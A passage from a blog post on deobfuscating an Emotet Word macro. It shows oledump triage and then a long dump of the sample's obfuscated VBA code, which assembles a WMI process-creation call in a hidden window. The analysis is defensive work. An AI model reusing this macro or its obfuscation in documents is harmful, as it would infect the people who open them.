{"id":1411,"date":"2020-09-22T23:45:51","date_gmt":"2020-09-22T22:45:51","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1411"},"modified":"2020-09-22T23:45:51","modified_gmt":"2020-09-22T22:45:51","slug":"2020-09-22-deobfuscating-emotet-script","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1411","title":{"rendered":"2020-09-22 Deobfuscating Emotet Script"},"content":{"rendered":"<p>Summary<br \/>\n=========<br \/>\nIn this post I am going to cover how I managed to deobfuscate the macro for this Emotet (Epoch 2) sample.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/email.png\" alt=\"\" width=\"1384\" height=\"822\" class=\"aligncenter size-full wp-image-1413\" \/><\/a><\/p>\n<p>The maldoc can be found <a href=\"http:\/\/github.com\/bloomer1016\/2020-09-21-Emotet--Epoch-2-\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>.<\/p>\n<p>Analysis<br \/>\n==========<br \/>\nWith this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately, I got a lot of Python errors when trying to run it. I then tried to run it through OfficeMalscanner and got nothing back as well. 
Looking at the Word doc via &#8220;file&#8221; I could see that there was a macro in the file and it wasn&#8217;t a rich-text file or something like that.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nherbie$ file LRE-090120\\ JYW-092120.doc \r\nLRE-090120 JYW-092120.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestias., Author: Clara Leroux, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time\/Date: Mon Sep 21 16:38:00 2020, Last Saved Time\/Date: Mon Sep 21 16:38:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 32, Security: 0\r\n<\/pre>\n<p>Since OleTools and OfficeMalScanner didn&#8217;t work, I then used the other failsafe, Didier Stevens&#8217; Oledump script. Using this I was able to see what appeared to be 2 macros in the Word doc, as seen below (denoted by the &#8216;M&#8217;).<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nherbie$ .\/oledump.py LRE-090120\\ JYW-092120.doc \r\n1: 114 '\\x01CompObj'\r\n2: 352 '\\x05DocumentSummaryInformation'\r\n3: 424 '\\x05SummaryInformation'\r\n4: 7035 '1Table'\r\n5: 125813 'Data'\r\n6: 514 'Macros\/PROJECT'\r\n7: 92 'Macros\/PROJECTwm'\r\n8: 97 'Macros\/Uoepmfd2vqk2\/\\x01CompObj'\r\n9: 296 'Macros\/Uoepmfd2vqk2\/\\x03VBFrame'\r\n10: 438 'Macros\/Uoepmfd2vqk2\/f'\r\n11: 504 'Macros\/Uoepmfd2vqk2\/o'\r\n12: M 27502 'Macros\/VBA\/Uoepmfd2vqk2'\r\n13: M 1679 'Macros\/VBA\/V216c23yqw7e5o2v'\r\n14: 15352 'Macros\/VBA\/_VBA_PROJECT'\r\n15: 1540 'Macros\/VBA\/__SRP_0'\r\n16: 106 'Macros\/VBA\/__SRP_1'\r\n17: 304 'Macros\/VBA\/__SRP_2'\r\n18: 103 'Macros\/VBA\/__SRP_3'\r\n19: 860 'Macros\/VBA\/dir'\r\n20: 4096 'WordDocument'\r\n<\/pre>\n<p>I started with the first stream that 
was found (-s 12) to see what was there. Bingo. We have obfuscated code.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nherbie$ .\/oledump.py -v -s 12 LRE-090120\\ JYW-092120.doc \r\nAttribute VB_Name = &quot;Uoepmfd2vqk2&quot;\r\nAttribute VB_Base = &quot;0{5BB1BF4C-1019-4625-9105-80272C0DD792}{28F2CF55-40FF-4E43-8677-C56C8C692899}&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = False\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = False\r\nFunction Cbzdhgt82a6foxc53q()\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(S_k9lapvm1p, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Z__ibn17mkfjsiol5, 212, 1)\r\nBiHOVG = Mid _\r\n(Qsj_pi2ufi2852dgfe, 35, 1)\r\nGQJzwq = Mid _\r\n(Dru0bzo5apcxe2pc9, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Zv3rshseproglck, 9, 1)\r\nlsFUF = Mid _\r\n(Srdtikao2ecvxgp, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Eyfuay0mr8k9q6da, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Pb0_ok1un1of8, 179, 1)\r\nwYVOV = Mid _\r\n(Gb1_y82tas2cma, 190, 1)\r\nmLdZb = Mid _\r\n(Z8abjber13o, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Zx0vguob716qdw, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Aqil91rp5ne, 168, 1)\r\nUCPVYn = Mid _\r\n(Levahjr27c9ut9_h, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Bu9x_darrq2t, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nQuuseim6entz = 90\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Lakcnp87s71f7n9y, 196, 1)\r\ndYvJsnjw = Mid _\r\n(A5ggaxmwnp7jz7c, 212, 1)\r\nBiHOVG = Mid _\r\n(Co19uulv2shhotan, 35, 1)\r\nGQJzwq = Mid _\r\n(Fezxrpn9ra_, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Q4_yp40i1ar, 9, 1)\r\nlsFUF = Mid _\r\n(Ppsqfi6oser3odx, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Iadulufzhu01cfphyg, 20, 
1)\r\nhNfbEKURZVE = Mid _\r\n(B893ifwurmi, 179, 1)\r\nwYVOV = Mid _\r\n(Ig_7z98hck4iw, 190, 1)\r\nmLdZb = Mid _\r\n(Dlm1jdicvcpi6, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Sayn_kxudj1k20, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Tezg_bkh3cebjv9rrc, 168, 1)\r\nUCPVYn = Mid _\r\n(Nbxqjlxuida0njd, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Y1b7np47k6in_f4ji, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nAy7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Abmzntc3d7_5amw0a, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Ssiyk2ux0lw, 212, 1)\r\nBiHOVG = Mid _\r\n(J8k82drrm2h, 35, 1)\r\nGQJzwq = Mid _\r\n(L_n7e5rsggqtwn, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Pe2u3fatdtdwtsuz0, 9, 1)\r\nlsFUF = Mid _\r\n(Uhknysf5e7gq2, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Jm6mwhqjprkma, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Y_xrrj5friri, 179, 1)\r\nwYVOV = Mid _\r\n(Ybfmy44jhyhd35, 190, 1)\r\nmLdZb = Mid _\r\n(U5cls96fiz0rri6, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Wn3tikexth03mqo, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Llmyff2sc78x1mma, 168, 1)\r\nUCPVYn = Mid _\r\n(Al2_kktzq3k0d, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Uliag7hq1xkqnnr9h, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nIhietwpuyrj0nq6 = &quot;g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq,&quot; + Ay7pmbj8ld_rk9 + &quot;g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq,&quot; + Uoepmfd2vqk2.Wjhx20hqda94eekj + &quot;g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,&quot;\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(R4j1tt_lcy2h4atkuq, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Ypad86i99ny8cbz2, 212, 1)\r\nBiHOVG = Mid _\r\n(K4eftvdnstug, 35, 1)\r\nGQJzwq = Mid _\r\n(E15ttry1n7lw, 34, 1)\r\nWKcaSvfi 
= Mid _\r\n(Yp3yfejl73l, 9, 1)\r\nlsFUF = Mid _\r\n(K691ply3zg9cush, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Nc85trxzv5o, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(X9l9safw2_9vx6, 179, 1)\r\nwYVOV = Mid _\r\n(Tr1ex8g457s_8, 190, 1)\r\nmLdZb = Mid _\r\n(Gev8i726avun, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Jselgze7h712u1f, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Baaior7nzp_w8r, 168, 1)\r\nUCPVYn = Mid _\r\n(Pkl5kzull4mb, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Wfzfwn9uteh7, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nWuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Lakeb7tqigcm, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Xh7xheg1ff26, 212, 1)\r\nBiHOVG = Mid _\r\n(Oi_e2jr0uxx3s, 35, 1)\r\nGQJzwq = Mid _\r\n(T8clzmkouz4xzsqk, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Ok2mkreq47hnui6zo, 9, 1)\r\nlsFUF = Mid _\r\n(Uc6ctagykldv0s, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Ucs3orq067qda, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(L90ldxhas21, 179, 1)\r\nwYVOV = Mid _\r\n(Qg4mi8zd4fn9, 190, 1)\r\nmLdZb = Mid _\r\n(Yne_gc9fy6ofj77b3v, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Bi6jftxuo9ikvamek, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Alz3a0loh0b, 168, 1)\r\nUCPVYn = Mid _\r\n(Bbvw72ed0rutuiqu5, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Y2v01jcji792, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nSet Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Qim37oqtd3b8p, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Ejqk82c1t5jf5wvd8, 212, 1)\r\nBiHOVG = Mid _\r\n(B7k3xvnrori_n92x23, 35, 1)\r\nGQJzwq = Mid _\r\n(Bkpg8zss2u59_7c6uv, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Q79pmwruqmog64, 9, 1)\r\nlsFUF = Mid _\r\n(Vzx1ncecw8ut, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Clcgbnfce7cvq, 
20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Bfmn0e6ani6i, 179, 1)\r\nwYVOV = Mid _\r\n(M5ls4ciqfkifs, 190, 1)\r\nmLdZb = Mid _\r\n(B15ue89c8jtwood9, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(J4byj4nktiz87eirs, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Iuz1lop8c0gy5nhr7, 168, 1)\r\nUCPVYn = Mid _\r\n(L_48rjwzjfbel, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Xw3oexsyjn2o, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nOxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Beh18bbci4uibjmm, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Vidj9mvisxz0, 212, 1)\r\nBiHOVG = Mid _\r\n(T0nlexcitv5n7, 35, 1)\r\nGQJzwq = Mid _\r\n(Bekqhtlgj1sd3xr, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Kmd0bw61e1k_ky, 9, 1)\r\nlsFUF = Mid _\r\n(Xc1teihsq0u1y, 240, 1)\r\nVAwYHAcv = Mid _\r\n(A6q3egsj8uqjulsim, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Pqwbcdmgh6xas8g7d6, 179, 1)\r\nwYVOV = Mid _\r\n(Fgr3xgfd6y7aiwzdi, 190, 1)\r\nmLdZb = Mid _\r\n(Z4mp0_yx7ctc, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Fxoezfz_78assl5p, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(V40yebt4ire_kd, 168, 1)\r\nUCPVYn = Mid _\r\n(U_yn5r_0uie8l9q, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Virj2eadw7mryvav, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nSet Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(T_zbtc1w4mtq, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Mcnx530dlo80, 212, 1)\r\nBiHOVG = Mid _\r\n(Mlly4qz_3dfgo0, 35, 1)\r\nGQJzwq = Mid _\r\n(A1eojnxok57cmfrw, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Bfvplftc2i10iqp5l, 9, 1)\r\nlsFUF = Mid _\r\n(Pksza68a59o, 240, 
1)\r\nVAwYHAcv = Mid _\r\n(Wksnejoi1vvmt, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Xqcnqjac7mko, 179, 1)\r\nwYVOV = Mid _\r\n(Stllwynnpr6, 190, 1)\r\nmLdZb = Mid _\r\n(Epdnazgg79q9q, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Dn3pgd2fy1pk_y, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Us0ibk5817xd, 168, 1)\r\nUCPVYn = Mid _\r\n(G3cn6et_v_l2, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(A3o021tadpr1phl, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nCfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Yj0lpxol1uc, 196, 1)\r\ndYvJsnjw = Mid _\r\n(A97xzc8zmeh36, 212, 1)\r\nBiHOVG = Mid _\r\n(Agnkq3qp0_vhben3o, 35, 1)\r\nGQJzwq = Mid _\r\n(Rul9thh69tz5b, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Mvwh9qdl9v_8, 9, 1)\r\nlsFUF = Mid _\r\n(Ma3lu27dltd, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Ecv682f9o1qtg59i, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(P10wf16fhedgd, 179, 1)\r\nwYVOV = Mid _\r\n(Btu3otra66_y, 190, 1)\r\nmLdZb = Mid _\r\n(Ojf14y1z5ebbn1zzw, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Tluo_wcuz7v, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Dxr9k7bpltnrjos1b, 168, 1)\r\nUCPVYn = Mid _\r\n(Ulj4imigjtxi05d0a, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Opp4yh2i0cfwem, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\nFunction Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(E8sewtjp2ud, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Croq4u8zd29c4txpk_, 212, 1)\r\nBiHOVG = Mid _\r\n(Eooe3vwi6pvzeh, 35, 1)\r\nGQJzwq = Mid _\r\n(B0jjxd0u0p_p, 34, 1)\r\nWKcaSvfi = Mid _\r\n(B76f3c0wzmx6h, 9, 1)\r\nlsFUF = Mid _\r\n(Bjsc47xrzgbno, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Vqz3gkf0vp8c, 20, 1)\r\nhNfbEKURZVE = Mid 
_\r\n(Pnwwop38lqngu, 179, 1)\r\nwYVOV = Mid _\r\n(Phydpz23jx6z9hdz, 190, 1)\r\nmLdZb = Mid _\r\n(E2xbdduy9xk, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Amwwvt38msns5d0, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Ssu5wmhp9ysedqrcr, 168, 1)\r\nUCPVYn = Mid _\r\n(Gkjdmyl32xoe, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ze40pcq8yfgz, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nSet Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Ntysp0l_ijtph1k77, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Y_z2nu_f36djtt0t, 212, 1)\r\nBiHOVG = Mid _\r\n(C_rqx3dp787eu7bhly, 35, 1)\r\nGQJzwq = Mid _\r\n(E2fesjhq8_1_, 34, 1)\r\nWKcaSvfi = Mid _\r\n(R4g8okkhwmsxea, 9, 1)\r\nlsFUF = Mid _\r\n(Zbci74ng960h, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Ihqf9oq3zf4bn9, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Kyroi0q69seylwj, 179, 1)\r\nwYVOV = Mid _\r\n(Ld57o7m11vq, 190, 1)\r\nmLdZb = Mid _\r\n(Xjgs643kov0r7, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Ny42efqen0ucg, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(I3yysf0ylx4t60x, 168, 1)\r\nUCPVYn = Mid _\r\n(Dnabnz8_ql637i04w, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Yx9k01n6mg9w, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nNgdcwyg32b4skvo5c1. 
_\r\nshowwindow = wdKeyEquals - wdKeyEquals\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(N8z1qrw043qy, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Cwoi88pz8kpt1, 212, 1)\r\nBiHOVG = Mid _\r\n(Q5x7sqeifek9, 35, 1)\r\nGQJzwq = Mid _\r\n(Tq00bpbyyxtsjyuwx, 34, 1)\r\nWKcaSvfi = Mid _\r\n(E1i0fg80if8rk, 9, 1)\r\nlsFUF = Mid _\r\n(Zcyi9moezv_gdoi3vw, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Wdhw4l4cdh73hnw, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(E_mzk8cby0_ds1q, 179, 1)\r\nwYVOV = Mid _\r\n(H0p53r79fkk9444, 190, 1)\r\nmLdZb = Mid _\r\n(M7b4i9i0bg06l1un2, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Mi9321douawfj, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Dgvxyxmn2r4wtbwp1, 168, 1)\r\nUCPVYn = Mid _\r\n(Eslv62elz6ohn88dzf, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Yze0fsr0ehc, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\nFunction Zk46e7c8d40(G7b_e54iwh7id_)\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(L31m5rr9jos, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Csilqzwq_u8iwbn76b, 212, 1)\r\nBiHOVG = Mid _\r\n(Ca1um8zqqh_8ew8g9e, 35, 1)\r\nGQJzwq = Mid _\r\n(Arn9d87r24ewchpo8o, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Xo3jfi_x3xz6q2_as2, 9, 1)\r\nlsFUF = Mid _\r\n(Qyqp9ymw8z1, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Z4aisjih1dje, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(B9y6dg9x63jq05v5x, 179, 1)\r\nwYVOV = Mid _\r\n(Ycozcptr3ju, 190, 1)\r\nmLdZb = Mid _\r\n(Npmu82y25t3vf, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(T4tpyodalbr, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Wimxpydsi6do9, 168, 1)\r\nUCPVYn = Mid _\r\n(E7jpk5ucz19mwgktd, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ct7pphedsy371, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nX8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)\r\nSet nnnnnnnnn = 
Languages\r\nBcfWWjIUB = Mid _\r\n(C6r3ywvl9t2w7hk_g, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Pj5z77yujf3qizd038, 212, 1)\r\nBiHOVG = Mid _\r\n(Hdv0f3uegx62vk, 35, 1)\r\nGQJzwq = Mid _\r\n(Nxap_wddnpu, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Hbt8qos76_ly8l, 9, 1)\r\nlsFUF = Mid _\r\n(M9opggegr0m96g_i, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Pkjdy2pncojtlms, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Wwg0anlg7c9dqxz6, 179, 1)\r\nwYVOV = Mid _\r\n(Ucwbx6g0bd37xfw6i, 190, 1)\r\nmLdZb = Mid _\r\n(P5jsj0civ4m8qzo3tk, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Qi3_a0juli8miixebs, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Uy0pjowfydr7x, 168, 1)\r\nUCPVYn = Mid _\r\n(Yv355jtap3_zr, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(R4vmjirjz4s, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nHy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, &quot;g, bq,&quot;)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Wm10z37ev280anbn, 196, 1)\r\ndYvJsnjw = Mid _\r\n(H6gq1q0gau0gz, 212, 1)\r\nBiHOVG = Mid _\r\n(Qot_o1_i5snhka, 35, 1)\r\nGQJzwq = Mid _\r\n(Cypl2hs2jg723, 34, 1)\r\nWKcaSvfi = Mid _\r\n(F908lkvsoyykbazc, 9, 1)\r\nlsFUF = Mid _\r\n(E0688t69iexj5s, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Fuwuol013wj3xrgrcg, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(S493lpd0df9ivf1c, 179, 1)\r\nwYVOV = Mid _\r\n(Kfzghicky3ircy, 190, 1)\r\nmLdZb = Mid _\r\n(Cf4fk4lfkn6v5oz, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Xozc8rstu7ryx7r, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Mnepnu4zd_o, 168, 1)\r\nUCPVYn = Mid _\r\n(Ixj70flcnwywxjwol, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Np75dqjjjnw_08dy, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nB4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid 
